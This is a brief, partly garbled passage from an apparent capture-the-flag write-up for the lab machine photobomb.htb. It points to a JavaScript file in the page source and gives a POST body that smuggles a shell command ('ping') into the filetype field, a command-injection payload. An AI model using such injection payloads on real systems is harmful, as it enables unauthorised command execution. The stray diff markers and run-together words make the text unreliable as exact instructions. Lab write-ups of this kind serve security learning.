Upon initial enumeration on photobomb.htb within the page source code you can see there is a script running in the background photobomb.js

 - Then send a

-request with the followingbody
+POSTrequest with the followingbodycontent.

 photo=wolfgang-hasselmann-RLEgmd1O7gs-unsplash.jpg&filetype=jpg;ping+-c+10+your_ip&dimensions=30x20